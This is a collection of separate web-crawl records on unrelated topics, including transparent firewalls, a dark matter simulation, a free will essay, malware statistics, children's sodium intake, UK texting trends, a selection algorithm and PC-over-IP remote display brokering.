s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280242.65/warc/CC-MAIN-20170116095120-00401-ip-10-171-10-70.ec2.internal.warc.gz
en
0.914704
564
2.640625
3
In traditional network configurations, a firewall serves as a default gateway for hosts connecting to one of its secured subnets. A transparent firewall, by contrast, acts like a "stealth firewall": it is actually a Layer 2 firewall. To implement this, the security appliance is connected to the same network on both its internal and external ports, with a separate VLAN for each interface. Now let's discuss the characteristics of transparent firewall mode:

- Transparent firewall mode supports an outside interface and an inside interface.
- A useful property of transparent firewall mode is that it can run in both single and multiple context modes.
- Instead of routing-table lookups, MAC address lookups are performed.

It is easy to introduce a transparent firewall into an existing network because it is not a routed hop: no IP readdressing is required, and maintenance is easier too. There is also no need for NAT configuration. Transparent mode acts as a bridge, but Layer 3 traffic (IP traffic) still cannot pass from a lower-security interface to a higher-security one unless it is explicitly permitted. To permit such traffic, an extended ACL can be configured on the transparent firewall. If no ACL is configured, only Address Resolution Protocol (ARP) traffic can pass through the transparent firewall, and ARP inspection can control it.

It is important to note that transparent firewalls only pass packets with a valid EtherType greater than or equal to 0x600, which means that IS-IS packets cannot pass through. There is one exception: BPDUs, which are supported.

IP addressing should be planned as if the security appliance were not present in the network. Make sure to assign a management IP address for connecting to and from the security appliance, and note that this address must be on the same subnet as the connected network. To differentiate the flow of traffic, the interfaces of the Layer 2 device and the security appliance must be on different VLANs.
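The behavior described above can be summarized as a Layer 2 forwarding decision. The toy simulation below is illustrative only – it is not Cisco configuration, and all constants and data structures are invented.

```python
# Toy simulation of a transparent firewall's Layer 2 forwarding decision.
BPDU_DEST = "01:80:c2:00:00:00"   # spanning-tree BPDUs: the supported exception

def forward(frame, mac_table, acl_permits):
    """Return an egress interface for the frame, or None to drop it."""
    if frame["dst_mac"] != BPDU_DEST:
        if frame["ethertype"] < 0x600:
            return None                      # e.g. IS-IS frames are not passed
        if frame["ethertype"] != 0x0806 and not acl_permits(frame):
            return None                      # IP traffic needs an extended ACL
    # A MAC-table lookup takes the place of a routing-table lookup:
    return mac_table.get(frame["dst_mac"], "flood")

mac_table = {"00:11:22:33:44:55": "inside"}
deny_all = lambda frame: False               # no ACL configured
print(forward({"dst_mac": "00:11:22:33:44:55", "ethertype": 0x0806},
              mac_table, deny_all))          # ARP passes: 'inside'
print(forward({"dst_mac": "00:11:22:33:44:55", "ethertype": 0x0800},
              mac_table, deny_all))          # IP without an ACL is dropped: None
```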
<urn:uuid:6d5b60e8-b5ba-42fd-934f-a84fc8c24089>
CC-MAIN-2017-04
https://howdoesinternetwork.com/2012/transparent-firewalls
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280888.62/warc/CC-MAIN-20170116095120-00061-ip-10-171-10-70.ec2.internal.warc.gz
en
0.946469
436
2.796875
3
This week astrophysicists from the University of California, Santa Cruz and New Mexico State University harnessed the power of Pleiades, a top-ten supercomputer housed at Ames Research Center in Mountain View, California, to generate the largest and most realistic simulations of the universe in its infancy. The simulation, which is called Bolshoi (the Russian word for "grand"), took over four years to develop. It tracks the movement of large bodies through space to demonstrate how dark matter surrounds galaxies and provides the gravity that glues them together. The computer code for the simulation was written by Anatoly Klypin, professor of astronomy at New Mexico State. Klypin noted, "These huge cosmological simulations are essential for interpreting the results of ongoing astronomical observations and for planning the new large surveys of the universe that are expected to help determine the nature of the mysterious dark energy."

Joel Primack, who heads the simulation program at UC Santa Cruz, discussed the size of the data sets involved – and what is possible when that information is made available to more researchers. He told IBTimes, "We've released a lot of the data so that other astrophysicists can start to use it. So far it's less than 1 percent of the actual output, because the total output is so huge, but there will be additional releases in the future."

According to Primack, "The simulation corroborates the accuracy of models that astronomers have built to clarify how the Big Bang theory initiated the source of subatomic particles and galaxies that inhabit our growing universe." This research will allow scientists to better understand how galaxies formed, as well as the formation and properties of dark matter and dark energy.
<urn:uuid:cf656c95-58e9-4f6e-accd-4bf70e94f159>
CC-MAIN-2017-04
https://www.hpcwire.com/2011/10/03/pleiades_shines_light_on_dark_matter/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280891.90/warc/CC-MAIN-20170116095120-00483-ip-10-171-10-70.ec2.internal.warc.gz
en
0.938315
359
3.421875
3
Window Dissection Technology

AutoMate's Window Dissection technology can be used to precisely identify any window by literally "seeing" and analyzing the objects and controls inside a specific window. Window Dissection encompasses a group of technologies that provide AutoMate with intelligence about the active windows and controls on a system. Windows are frequently identified by their title, but occasionally this is not enough. If, for example, there are many windows open with the same title, it is necessary to specify additional criteria to identify the particular window. Window Dissection allows a window to be specified based on the objects, controls, or text inside it. Multiple objects may be specified which, when taken together, formulate a description of a unique window on the system.
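A plausible sketch of the matching logic follows. The data structures and criteria are invented for illustration and are not AutoMate's actual API.

```python
# Hypothetical "window dissection" matcher: identify a window by its title
# plus the controls it contains.
def matches(window, title=None, required_controls=()):
    if title is not None and window["title"] != title:
        return False
    texts = {control["text"] for control in window["controls"]}
    return all(required in texts for required in required_controls)

open_windows = [
    {"title": "Login", "controls": [{"text": "User name"}, {"text": "OK"}]},
    {"title": "Login", "controls": [{"text": "Server"}, {"text": "Connect"}]},
]
# Two windows share a title; their controls disambiguate them.
target = [w for w in open_windows
          if matches(w, title="Login", required_controls={"Server", "Connect"})]
print(len(target))  # 1
```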
<urn:uuid:692153e6-22c0-4911-94bd-25c64eeebb9b>
CC-MAIN-2017-04
http://www.networkautomation.com/automate/features/window-dissection/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00207-ip-10-171-10-70.ec2.internal.warc.gz
en
0.878748
151
2.75
3
A Guide to Making High-Quality Decisions

We are all busy, but not as busy as our approach to decision making would suggest. Many important decisions are left until the last minute, forcing a quick decision when it was not originally necessary. As a result, quick decisions are often poor-quality decisions. The occasional successful outcome and a hectic lifestyle convince us to continue to make hurried choices, even though many of the problems we are solving today are the result of the "quick fixes" of yesterday. In order to arrive at consistently high-quality decisions, we need to slow down. Our thinking needs to be dissected. Sources of information need to be questioned and assumptions should be verified. Using the steps in this white paper as a guide will help you overcome the common weaknesses in decision analysis.

We need to ensure that our thinking is balanced, our logic is sound and our information sources are complete and correct. The techniques for doing these things are the role and function of critical thinking. Critical thinking helps to reveal the gaps in our knowledge and the imperfections in our reasoning that stem from conscious or unconscious assumptions and mental shortcuts. To arrive at better decisions, it is necessary to ensure that our reasoning is consistent and methodical. The tools of critical thinking provide a format for questioning the reasoning and logic of the inputs to the decision-making process. The intention of critical thinking is to separate the known from the unknown and the subjective from the objective. Ask questions about all aspects of the problem:

- What are the sources of information?
- Is there bias in the information?
- What is the point of view of the person(s) interpreting the information?
- What concepts are inherent in the reasoning being used in the evaluation of options?
- Have all possible options been considered?
<urn:uuid:ed58d386-07f3-48a5-9baa-3d701e81e384>
CC-MAIN-2017-04
https://www.globalknowledge.com/ca-en/resources/resource-library/white-paper/a-guide-to-making-high-quality-decisions/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280900.71/warc/CC-MAIN-20170116095120-00327-ip-10-171-10-70.ec2.internal.warc.gz
en
0.946182
363
3.46875
3
Here I will lay out two ways of looking at free will, which I call the absolute and the practical perspectives. I believe these two classifications take into account both the existing, well-traveled arguments and the treacherous semantic issues that frequently obscure free will discussions.

Absolute free will is the ability to have willfully chosen otherwise for any previous decision. This is the type of free will that I argue is required for true moral responsibility. In short, if someone could not have made a willful choice to do otherwise than they did, then they cannot be held responsible for what they did do. But there's another way of imagining free will that doesn't conflict with this version, but instead complements it:

Practical free will is the ability for an individual to experience having options, consider the outcomes of those options within the context of their value system, and then experience making a choice from among them based on what they want to happen.

On my view, and the view of most incompatibilists, this type of free will is completely consistent with absolute free will being impossible. Just because we couldn't have actually done otherwise than what we did—at the chemical and physical level—doesn't make the experience of making choices insignificant to us as humans. As Daniel Dennett points out, we as humans have the ability to do things like decide to go to work to avoid being fired, or to influence climate for future generations, or to blow up distant asteroids to keep them from crashing into Earth 5 years into the future. These things require complex analysis of variables for the purpose of promoting our own goals – which may even be altruistic if we are so inclined. In short, the experience of making choices is central to human existence. It serves as the foundation of how we view and treat others, and of how we reward and punish those who make certain choices.

Well, if we all agree that practical free will is…well…practical, then why am I pursuing this differentiation? Quite simply, I believe it's beneficial to human civilization to acknowledge that true (absolute) free will is impossible, and thus to realize that all failure, loss, and evil were ultimately the result of bad causes. This doesn't mean we suddenly give people excuses for making poor choices. We won't accept "The atoms made me do it" at a first-degree murder trial. We will still hold that person responsible for his actions, but it will be done in a consequentialist fashion rather than a retributivist one. Most of the world today would think it OK to throw rotting fruit at this person before he's hanged in the town square. Or to curse at him, and damn him to an eternity of suffering in hell. This is considered civilized behavior for one reason: the belief in (Absolute) Free Will. An advanced society would realize that while this murderer had Practical Free Will, he did not have Absolute Free Will, meaning the action he took was the only one he could have taken.

The result will not be a lack of punishment, but rather a measured response given the knowledge that he could not have done differently, i.e.:

- A response that best helps the rest of the world
- A response that best helps the murderer feel empathy for the victim
- A response that keeps the rest of the population safe from the murderer while he is dangerous
The result will not be a lack of punishment, but rather a measured response given knowledge that he could not have done differently, i.e.: - A response that best helps the rest of the world - A response that best helps the murderer feel empathy for the victim - A response that keeps the rest of the population safe from the murderer while he is dangerous Possible examples could include incarceration, teaching the attacker about the victim’s life so that he feels sympathy and remorse, or just generally educating him so that he realizes what he’s done is wrong. The key thing to realize is that we don’t know yet what would be best. That’s an empirical question that we need data for. But the one thing we shouldn’t be doing is be wishing an eternity of torture on broken, uneducated people who literally had no choice in the matter. It’s not civilized. It’s barbaric. All anger at offenders, all hatred of evil, all desire for retribution—they all hinge upon the single and untrue proposition that the perpetrator could have done otherwise. If that is incorrect, which I believe it is, then it is beholden on us, as humans attempting to be humane, to change how we treat those who make poor decisions. This affects not just how we treat criminals, but also the rich and the poor, the powerful and the weak, and any other group distinction that we currently feel is choice-based. It affects the very fabric of our civilization. - There is a kind of free will that we don’t, and cannot have, which is called Absolute Free Will. This is the kind that allows us to do otherwise for any previous decision. This type of free will is required for Moral Responsibility because if someone could not have done otherwise then they are not morally responsible. - There is another kind of free will, which is actually the experience of Free Will, called Practical Free will. This is the ability to contemplate options and experience picking the one we want. Everyone experiences this every day, and it should not be discounted, but it does not meet the standard for Moral Responsibility in any context other than a Consequentialist one. - People accepting that we have the latter, but not the former, and adopting a social policy that adjusts based on this truth will have a positive impact on society. This is true because realizing that people lack choice encourages us to look at those who suffering or making poor decisions with empathy instead of hatred or derision. - Image from salon.com.
<urn:uuid:c33976a8-f559-4948-82c4-fa9aa892f28b>
CC-MAIN-2017-04
https://danielmiessler.com/blog/absolute_vs_practical_free_will/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279933.49/warc/CC-MAIN-20170116095119-00448-ip-10-171-10-70.ec2.internal.warc.gz
en
0.951049
1,179
2.515625
3
High-voltage direct current (HVDC) transmission systems use direct current for the bulk transmission of electric power. Power stations generate alternating current (AC), and most transmission lines carry AC that oscillates at 50 or 60 cycles per second, which leads to high energy losses. Direct current doesn't oscillate. In an HVDC system, the power is converted at a converter station and transferred by overhead lines and cables to the receiving point; there it is converted back to AC at another converter station and injected into the AC lines.

The report "HVDC Market Forecast 2014-2019" analyses the market in terms of geography, with segmentation covering Europe, Asia Pacific, and America. The rising demand for electricity and the need to transmit it with less energy loss are driving the growth of the HVDC market. Nowadays, the share of energy from renewable sources like wind and solar is increasing, but these sorts of power plants tend to be far from urban areas. The growing number of wind farms, which need a reliable means of energy transmission, has been driving the HVDC market. Most countries worldwide have set targets to increase the percentage of energy contributed by renewable sources. HVDC power transmission is a reliable system that enables long-distance power transmission without high energy loss, and renewable energy power plants are the main force driving this market's growth.

The report provides an extensive competitive landscape of the key companies operating in this market. The key players are ABB (Switzerland), Alstom (France), Mitsubishi (Japan), and others. Further, country-wise market share, new product and service launches, M&A activity, and the product portfolios of key players are covered in the report. Along with the market data, you can also customize MMM assessments to meet your company's specific needs. Customization provides comprehensive, industry-standard and deep-dive analysis of the following parameters:

Product Benchmarking Outlook
- Technology advancement in HVDC transmission systems
- Comparison of HVDC and HVAC
- Competitor analysis

Customer Segment Outlook
- Impact of HVDC innovations on the power industry
- Challenges in the HVDC industry

1.1 Analyst Insights
1.2 Market Definitions
1.3 Market Segmentation & Aspects Covered
1.4 Research Methodology
2 Executive Summary
3 Market Overview
<urn:uuid:33f7bbc1-01ec-4fa4-86fe-01df1c0c2d57>
CC-MAIN-2017-04
http://www.micromarketmonitor.com/market-report/high-voltage-direct-current-hvdc-reports-7508846522.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280774.51/warc/CC-MAIN-20170116095120-00264-ip-10-171-10-70.ec2.internal.warc.gz
en
0.896862
528
2.546875
3
According to the recently published Websense report for the second half of 2009, 95 percent of user-generated posts on Web sites are spam or malicious, and almost 14 percent of searches for buzzwords/trending news led to malware. Add to this the fact that 86 percent of all email is spam and that 81 percent of it contained a malicious link, and you might be forgiven for thinking that soon the Internet and we ourselves will be drowning in a sea of unwanted and damaging content.

More bad news is that in 71 percent of cases, the malware we are exposed to while surfing is located on legitimate sites that have been compromised, and that the average time it took anti-virus vendors to deliver a patch once malware was identified was 46 hours! Compared to the 22 hours it took them in the first six months of the year, they are definitely not moving in the right direction.

What can we expect in 2010?

- More and more blended threats will target computers and trap them into botnets
- Smartphones, computers running Windows 7, search engines and legitimate websites will be used by criminals as infection vectors
- Spam and attacks on the social Web and on search engines that have added real-time search capabilities will increase in frequency
- Botnets will start showing more aggressive behavior – bots will be able to detect and actively uninstall competitor bots
- Flaws in Windows 7 and IE 8 will be exploited
- SEO poisoning attacks will continue to undermine trust in search results
- Vulnerabilities in the iPhone and Android will also be taken advantage of more often, especially since mobile phones are increasingly being used for financial transactions
- As Macs gain popularity, so will the attacks that target them

To read the report in detail, go here. NOTE: You'll have to share some information in order to get it.
<urn:uuid:ea47d4c2-9a7b-486f-a668-ca71dd5ef7a4>
CC-MAIN-2017-04
https://www.helpnetsecurity.com/2010/02/09/81-percent-of-e-mail-links-to-malware/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280774.51/warc/CC-MAIN-20170116095120-00264-ip-10-171-10-70.ec2.internal.warc.gz
en
0.953834
370
2.515625
3
New Geek Words Now Officially English

Our geek culture brings us some really cool technology, and along with it new geek terminology. The authoritative dictionary of the English language, the "Concise Oxford English Dictionary", has announced that it is adding the words sexting, woot, textspeak and retweet to its dictionary. Earlier this year it added LOL, OMG and the heart symbol (♥) to the dictionary.

1. Cyberbullying (noun): The use of electronic communication to bully a person, typically by sending messages of an intimidating or threatening nature: children may be reluctant to admit to being the victims of cyberbullying.

2. Woot (exclamation, informal): (Especially in electronic communication) used to express elation, enthusiasm, or triumph.

3. Retweet (verb): (On the social networking service Twitter) repost or forward (a message posted by another user): tweet the URL of your posting; people love to retweet job ads. Also: (noun) a reposted or forwarded message on Twitter: traffic spiked quickly and contained a mix of retweets and original posts.

4. Sexting (noun, informal): The sending of sexually explicit photographs or messages via mobile phone: like it or not, sexting is part of growing up in 2010.

5. Textspeak (noun): Language regarded as characteristic of text messages, consisting of abbreviations, acronyms, initials, emoticons, etc.
<urn:uuid:cc215f50-fb51-456c-a3b5-f0d5e3d769b7>
CC-MAIN-2017-04
http://craigpeterson.com/language/geek/new-geek-words-now-offically-english/1396
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280086.25/warc/CC-MAIN-20170116095120-00292-ip-10-171-10-70.ec2.internal.warc.gz
en
0.881865
274
2.8125
3
The vast majority of cyberattacks that affect physical machines can also attack virtual machines. Moreover, the risks within virtual environments can be even higher. Although virtualization can improve IT agility and efficiency, it also adds extra layers of technology. Maintaining visibility of each layer of technology – and how they interact – can be difficult. Many virtual environments naturally contain a greater number of ‘attack surfaces’ – and that gives cybercriminals more opportunities to attack the business. Virtual Machines Need Security Designed for Virtual Machines Most businesses have found that, as virtualization spreads to more areas of their IT estate, their overall virtual environment becomes much more complex. Today, a typical enterprise’s virtual environment will include a wide range of different technologies – with many running under different hypervisors. Again, all of this diverse infrastructure needs to be protected against data breach and cyberattacks – but standard security technologies are not well suited to virtual environments.
<urn:uuid:71e27725-302c-4adc-968e-7ad996c76be6>
CC-MAIN-2017-04
https://www.kaspersky.com.au/enterprise-security/virtualization
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00318-ip-10-171-10-70.ec2.internal.warc.gz
en
0.930859
188
2.953125
3
Cogswell M.E., Division for Heart Disease and Stroke Prevention | Yuan K., Division for Heart Disease and Stroke Prevention | Gunn J.P., Division for Heart Disease and Stroke Prevention | Gillespie C., Division for Heart Disease and Stroke Prevention | And 8 more authors. Morbidity and Mortality Weekly Report | Year: 2014

Background: A national health objective is to reduce average U.S. sodium intake to 2,300 mg daily to help prevent high blood pressure, a major cause of heart disease and stroke. Identifying common contributors to sodium intake among children can help reduction efforts.

Methods: Average sodium intake, sodium consumed per calorie, and proportions of sodium from food categories, place obtained, and eating occasion were estimated among 2,266 school-aged (6–18 years) participants in What We Eat in America, the dietary intake component of the National Health and Nutrition Examination Survey, 2009–2010.

Results: U.S. school-aged children consumed an estimated 3,279 mg of sodium daily, with the highest total intake (3,672 mg/d) and intake per 1,000 kcal (1,681 mg) among high school–aged children. Forty-three percent of sodium came from 10 food categories: pizza, bread and rolls, cold cuts/cured meats, savory snacks, sandwiches, cheese, chicken patties/nuggets/tenders, pasta mixed dishes, Mexican mixed dishes, and soups. Sixty-five percent of sodium intake came from store foods, 13% from fast food/pizza restaurants, 5% from other restaurants, and 9% from school cafeteria foods. Among children aged 14–18 years, 16% of total sodium intake came from fast food/pizza restaurants versus 11% among those aged 6–10 years or 11–13 years (p<0.05). Among children who consumed a school meal on the day assessed, 26% of sodium intake came from school cafeteria foods. Thirty-nine percent of sodium was consumed at dinner, followed by lunch (29%), snacks (16%), and breakfast (15%).

Implications for Public Health Practice: Sodium intake among school-aged children is much higher than recommended. Multiple food categories, venues, meals, and snacks contribute to sodium intake among school-aged children, supporting the importance of populationwide strategies to reduce sodium intake. New national nutrition standards are projected to reduce the sodium content of school meals by approximately 25%–50% by 2022. Based on this analysis, if there is no replacement from other sources, sodium intake among U.S. school-aged children will be reduced by an average of about 75–150 mg per day and about 220–440 mg on days children consume school meals. © 2014, Department of Health and Human Services. All rights reserved.

Sebastian R.S., Food Surveys Research Group | Enns C.W., Food Surveys Research Group | Goldman J.D., Food Surveys Research Group | Martin C.L., Food Surveys Research Group | And 3 more authors. Journal of Nutrition | Year: 2015

Background: Epidemiologic studies demonstrate inverse associations between flavonoid intake and chronic disease risk. However, lack of comprehensive databases of the flavonoid content of foods has hindered efforts to fully characterize population intakes and determine associations with diet quality.

Objectives: Using a newly released database of flavonoid values, this study sought to describe intake and sources of total flavonoids and 6 flavonoid classes and identify associations between flavonoid intake and the Healthy Eating Index (HEI) 2010.

Methods: One day of 24-h dietary recall data from adults aged ≥20 y (n = 5420) collected in What We Eat in America (WWEIA), NHANES 2007-2008, were analyzed. Flavonoid intakes were calculated using the USDA Flavonoid Values for Survey Foods and Beverages 2007-2008. Regression analyses were conducted to provide adjusted estimates of flavonoid intake, and linear trends in total and component HEI scores by flavonoid intake were assessed using orthogonal polynomial contrasts. All analyses were weighted to be nationally representative.

Results: Mean intake of flavonoids was 251 mg/d, with flavan-3-ols accounting for 81% of intake. Non-Hispanic whites had significantly higher (P < 0.001) intakes of total flavonoids (275 mg/d) than non-Hispanic blacks (176 mg/d) and Hispanics (139 mg/d). Tea was the primary source (80%) of flavonoid intake. Regardless of whether the flavonoid contribution of tea was included, total HEI score and component scores for total fruit, whole fruit, total vegetables, greens and beans, seafood and plant proteins, refined grains, and empty calories increased (P < 0.001) across flavonoid intake quartiles.

Conclusions: A new database that permits comprehensive estimation of flavonoid intakes in WWEIA, NHANES 2007-2008; identification of their major food/beverage sources; and determination of associations with dietary quality will lead to advances in research on relations between flavonoid intake and health. Findings suggest that diet quality, as measured by HEI, is positively associated with flavonoid intake. © 2015 American Society for Nutrition.
<urn:uuid:2dddf2ad-327f-4d95-b4c5-056a7124bee4>
CC-MAIN-2017-04
https://www.linknovate.com/affiliation/food-surveys-research-group-1617130/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00072-ip-10-171-10-70.ec2.internal.warc.gz
en
0.92876
1,108
3.34375
3
How to Reduce Data Center Waste

It is the silent killer of IT budgets in every industry, for companies of virtually every size: runaway electricity consumption in the data center. Regardless of the ongoing debate about carbon footprints and climate change, Knowledge Center contributor Andy Dominey explains here the most compelling reason for IT executives to pay closer attention to this issue: the opportunity to achieve dramatic and immediate savings by reducing data center waste.

The Environmental Protection Agency (EPA) estimated that the computer servers in this country recently consumed 61 billion kilowatt-hours (kWh) in a single year. That is about 1.5 percent of all electricity consumed in the country, a $4.5B expense. The problem is not about to go away, either. Consider that, in 2011, the EPA expects that data centers' electricity consumption could spike to as high as 100 billion kWh, a $7.4B expense.

As much as 25 percent of a typical IT budget is allocated simply to paying the electric bill. What's more, that cost is rising as much as 20 percent each year, while IT budgets only increase about six percent annually. However, the costs do not stem from the computer hardware alone: for every watt of electricity powering a server, another watt is needed for data center infrastructure such as cooling and lighting. From this perspective, enterprises have a fiduciary duty to cut their costs by achieving greater efficiencies in the data center.

Start with the usage profile

Few IT managers would argue that their data centers are home to vast numbers of underutilized servers. Commodity hardware and constant expansions to the business application portfolio mean that almost every new application provisioned into the data center ends up with its own server or servers. That is a lot more hardware to track and manage, making it harder to know what every server is doing and whether it is still required.

Over-provisioning is also common. Many applications designed to serve only 10,000 users are given an infrastructure that serves 20,000, and this is often done cavalierly because hardware costs have dropped so much. This scenario creates unnecessarily large electrical and cooling demands, to say nothing of software licensing, server management and other infrastructure costs. What's more, clusters with multiple load-balanced, fault-tolerant servers often lie dormant while steadily drawing power, as long as the active node functions correctly. High availability is not always needed for every application type.
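To get a feel for these numbers, a quick back-of-the-envelope calculation helps. The Python sketch below estimates the annual electricity cost of a single server, including the one-watt-of-overhead-per-watt rule of thumb mentioned above; the 400 W draw and $0.10/kWh price are illustrative assumptions, not figures from the article.

```python
# Back-of-the-envelope estimate of a server's annual electricity cost.
# The input figures below are illustrative assumptions.

HOURS_PER_YEAR = 24 * 365

def annual_energy_cost(server_watts, price_per_kwh, overhead_factor=2.0):
    """Estimate the yearly electricity cost for one server.

    overhead_factor=2.0 reflects the rule of thumb that every watt of
    server power needs another watt for cooling and lighting.
    """
    kwh_per_year = server_watts * overhead_factor * HOURS_PER_YEAR / 1000.0
    return kwh_per_year * price_per_kwh

if __name__ == "__main__":
    # Assumed: a 400 W server and $0.10/kWh electricity.
    cost = annual_energy_cost(server_watts=400, price_per_kwh=0.10)
    print(f"Estimated annual cost: ${cost:,.2f}")  # roughly $700 per server
```

Multiplied across hundreds of underutilized servers, even this rough estimate shows why consolidation pays for itself quickly.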
<urn:uuid:ab34c8a1-af66-479f-88e5-df4de393c1b3>
CC-MAIN-2017-04
http://www.eweek.com/c/a/Green-IT/How-to-Reduce-Data-Center-Waste
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282110.46/warc/CC-MAIN-20170116095122-00034-ip-10-171-10-70.ec2.internal.warc.gz
en
0.949371
500
2.65625
3
In 2011 more than 150 billion messages were sent in the UK. An Ofcom study celebrating the 20th anniversary of the first text ever sent reveals that the average UK consumer now sends 50 text messages a week. SMS has changed the way people communicate, with the number of messages sent in the UK tripling in the last five years.

Texting is the preferred way to communicate among young people. An average of 193 texts are sent every week by 12-15 year olds, far higher than the UK average; the figure has more than doubled from last year, when only 91 texts were sent per week. Ofcom's 2012 Communications Market Report revealed that teenagers and young adults choose texting to stay in touch with friends and family rather than talking face-to-face. The report found that 90% of 16-24 year olds used texting to communicate. Talking on the phone is less popular among young adults, with only 67% making mobile calls daily and only 63% talking face to face.

"When texting was first conceived many saw it as nothing more than a niche service," said James Thicket, Ofcom's director of research. "Texts have now surpassed traditional phone calls and meeting face to face as the most frequent way of keeping in touch for UK adults, revolutionising the way we socialise, work and network."

While texting remains hugely popular, Ofcom's figures show that SMS volumes have begun to decline this year. In Q1 2012 the number of text messages sent fell to 39.1 billion, and in Q2 2012 it declined further to 38.5 billion. The research suggests that alternative forms of communication, such as social networking sites, could be the reason for the SMS decline. The recent increase in tablet ownership could also be responsible for the trend.

"For the first time in the history of mobile phones, SMS volumes are showing signs of decline. However the availability of a wider range of communications tools like instant messaging and social networking sites mean that people might be sending fewer SMS messages, but they are 'texting' more than ever before."
<urn:uuid:ac0baac6-967c-47ad-9a01-230767402257>
CC-MAIN-2017-04
http://www.cbronline.com/news/texting-is-now-more-popular-than-talking-031212
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00338-ip-10-171-10-70.ec2.internal.warc.gz
en
0.957591
441
2.625
3
Definition: Given an array A of n elements and a positive integer k ≤ n, find the kth smallest element of A and partition the array such that A[1], ..., A[k-1] ≤ A[k] ≤ A[k+1], ..., A[n].

See also select kth element, Select, MODIFIND, Find.

Note: Algorithms that solve this problem are often used in sort algorithms or to find the median of a set. They can easily be changed to find the kth largest element.

If you have suggestions, corrections, or comments, please get in touch with Paul Black.

Entry modified 2 March 2015. HTML page formatted Mon Mar 2 16:13:48 2015.

Cite this as: Vladimir Zabrodsky, "select and partition", in Dictionary of Algorithms and Data Structures [online], Vreda Pieterse and Paul E. Black, eds. 2 March 2015. (accessed TODAY) Available from: http://www.nist.gov/dads/HTML/selectAndPartition.html
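The entry defines the problem rather than any particular algorithm. One standard solution is a quickselect-style approach, sketched below in Python as a hypothetical illustration (it is not part of the dictionary entry): it finds the kth smallest element in expected linear time and leaves the array partitioned around it.

```python
import random

def select_and_partition(a, k):
    """Find the kth smallest element (1-based) of list `a`, rearranging
    `a` in place so that a[:k-1] <= a[k-1] <= a[k:]. Requires 1 <= k <= len(a)."""
    def partition(lo, hi, pivot_index):
        # Lomuto partition: move pivot to the end, sweep, then restore it.
        a[pivot_index], a[hi] = a[hi], a[pivot_index]
        store = lo
        for i in range(lo, hi):
            if a[i] < a[hi]:
                a[i], a[store] = a[store], a[i]
                store += 1
        a[store], a[hi] = a[hi], a[store]
        return store

    lo, hi, target = 0, len(a) - 1, k - 1
    while True:
        if lo == hi:
            return a[lo]
        p = partition(lo, hi, random.randint(lo, hi))
        if p == target:
            return a[p]
        elif p < target:
            lo = p + 1   # kth element lies to the right of the pivot
        else:
            hi = p - 1   # kth element lies to the left of the pivot

# Example usage:
a = [9, 1, 8, 3, 7, 5]
assert select_and_partition(a, 3) == 5   # third smallest element
assert max(a[:2]) <= a[2] <= min(a[3:])  # array is partitioned around it
```

The random pivot choice keeps the expected running time linear even on adversarial inputs, which is why variants of this routine appear inside sorting and median-finding algorithms.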
<urn:uuid:f5e165e8-8604-4801-958c-13322216a444>
CC-MAIN-2017-04
http://www.darkridge.com/~jpr5/mirror/dads/HTML/selectAndPartition.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00182-ip-10-171-10-70.ec2.internal.warc.gz
en
0.833946
234
3.484375
3
A key aspect of Desktop and Presentation Virtualization is the remote presentation protocol. The remote presentation protocol is the transport medium that connects the server, on which applications actually run, and the client, which presents their user interface, and with which the user interacts. Through the remote presentation protocol, information from a session running on the server, such as display updates, sound and print jobs, is transmitted to the client over a network. The client, in turn, transmits user interactions, such as key strokes and mouse movements, back to the server for processing.

The remote presentation protocol must operate in such a way that applications need not be modified in order to support this separation of processing and user interface. Likewise, users should also be unaware of this separation – from the users' perspective the remote desktops and applications should behave as if they were running locally on the client device.

There are several common remote presentation protocols, such as RDP, ICA and VNC, and in many cases these protocols satisfy the requirements for remote access. But in various situations they are not appropriate, because they cannot provide enough performance for remotely running applications to behave like local ones. Common examples of scenarios where these protocols are insufficient include multimedia, e.g. streaming video, voice-over-IP, and 3D applications such as CAD or video games. In some cases these limitations can be circumvented, for example by redirecting video streams directly to the client. However, these workarounds don't always work, for example in the event of a new video player or codec, or they may alter application behavior and the user experience. This is where PC-over-IP™ comes in.

So what is PC-over-IP (PCoIP)? It is a new type of remote presentation protocol developed by Teradici that delivers a true PC experience from a server, over an IP network, to a client device. This means full fidelity audio and video, with support for 3D graphics, and also support for local peripherals such as USB devices and printers. PC-over-IP utilizes dedicated chipsets on the server (Host) and client (Portal) to achieve this level of performance.

Ericom and Teradici have partnered to deliver the benefits of PC-over-IP. Ericom PowerTerm WebConnect provides the mandatory PCoIP Broker functionality that assigns clients to the appropriate hosts, provides centralized management, and controls access rights. Another feature provided by Ericom PowerTerm WebConnect is the ability to connect to Teradici hosts from clients that are not Teradici-enabled, using RDP. I've written a blog post about the PCoIP brokering capabilities provided by PowerTerm WebConnect, and I've also posted a video which demonstrates this functionality. You can also find information about this on the Ericom website.
<urn:uuid:a10550cf-4f21-47b8-919e-be86715b68c8>
CC-MAIN-2017-04
https://www.ericom.com/communities/blog/introducing-pc-over-ip
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280730.27/warc/CC-MAIN-20170116095120-00576-ip-10-171-10-70.ec2.internal.warc.gz
en
0.931598
580
2.53125
3
